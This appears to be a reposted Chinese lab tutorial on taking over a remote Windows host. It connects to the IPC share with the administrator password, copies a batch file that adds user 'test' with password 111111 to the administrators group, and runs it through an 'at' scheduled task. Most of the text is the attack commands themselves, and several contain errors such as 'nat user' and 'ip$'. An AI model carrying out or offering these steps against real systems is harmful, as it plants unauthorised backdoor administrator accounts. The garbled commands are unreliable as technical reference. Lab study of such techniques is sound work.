本文共 664 字，大约阅读时间需要 2 分钟。

1. 实验准备

1）查看目标主机是否打开共享：net share /增加共享：net share c$=c://删除共享：net share c$ /del

2）新建一个user.bat文件，文件中命令net user test 111111 /add net localgroup administrators test /add/作用，在目标主机上创建一个用户test,密码111111，将用户test增加到administrator组；

3）修改目标主机的administrator密码：nat user administrator 111111

2.实验阶段

1）建立连接：net use //192.168.3.1/ip$ 111111 /user:administrator

2)拷贝文件：copy user.bat //192.168.3.1/c$

3)查看目标机器的时间：net time //192.168.3.1

4)在目标机器上创建运行程序的任务：at //192.168.3.1 14:00 "c:/user.bat"

5)查看任务是否创建：at //192.168.3.1

3.验证阶段

1）通过远程桌面连接目标主机，192.168.3.1，登录过程中输入用户名和密码，查看是否可以登录，登录成功后查看是否是administrator权限；

2）在目标主机上运行net user 查看是否具有test用户，如果有，运行net user test，查看其权限是否属于本地用户组administrators

转载地址：http://qonli.baihongyu.com/